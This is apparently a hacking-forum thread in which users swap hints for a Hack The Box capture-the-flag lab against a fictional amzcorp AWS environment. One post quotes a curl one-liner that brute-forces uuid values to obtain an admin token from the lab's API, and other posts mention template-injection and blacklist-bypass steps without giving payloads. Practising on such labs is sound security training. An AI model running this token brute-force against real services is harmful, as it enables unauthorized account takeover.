Return to forum

ILoveNSA · September 21, 2022 at 12:15 PM

(September 20, 2022, 08:43 PM)m4rsh3ll Wrote: Is there all web servers down? 503 Service Unavailable

They sometimes do that, wait a moment

rootx · October 6, 2022 at 9:19 AM

stuck in flag 2 any help ???

seventeen · October 6, 2022 at 7:04 PM

anyone 3lse doing this Fortress?
I need help on 3rd flag!!
Can anyone help .....

joker1764 · October 17, 2022 at 6:53 AM

[quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]Why do you bruteforce uuid between values 950 and 975? How did you find that you should do this?

huyqa · October 19, 2022 at 3:50 AM

[quote="joker1764" pid="667076" dateline="1665989598"][quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]Why do you bruteforce uuid between values 950 and 975? How did you find that you should do this?[/quote]You should create new user then you type that command --> get flag 1echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"{ "flag": "***", "token": "***", "username": "admin", "uuid": "955"}

DH4RM4 · October 19, 2022 at 5:13 PM

Hi! I'm new on the community! I'm trying to solve the AWS from HTB. Anyone speak spanish??

gusthechickenman · November 22, 2022 at 3:26 AM

Stuck at flag 5 (relentless). I got the yml template config & access to inventory but I'm kinda stuck there. Any clue?

hacker9999 · November 24, 2022 at 3:18 PM

(November 22, 2022, 03:26 AM)gusthechickenman Wrote: Stuck at flag 5 (relentless). I got the yml template config & access to inventory but I'm kinda stuck there. Any clue?

For flag 4, any hint on bypass the blacklist? always got 500 response

hacker9999 · November 25, 2022 at 11:02 AM

Got a list of subclasses through ssti, but if i call any function, it throws 500 error
I can only list function names, any nudge please.

gusthechickenman · November 28, 2022 at 9:21 PM

(November 24, 2022, 03:18 PM)hacker9999 Wrote:
(November 22, 2022, 03:26 AM)gusthechickenman Wrote: Stuck at flag 5 (relentless). I got the yml template config & access to inventory but I'm kinda stuck there. Any clue?

For flag 4, any hint on bypass the blacklist? always got 500 response

Don't dig too deep, the bypass is VeRy simple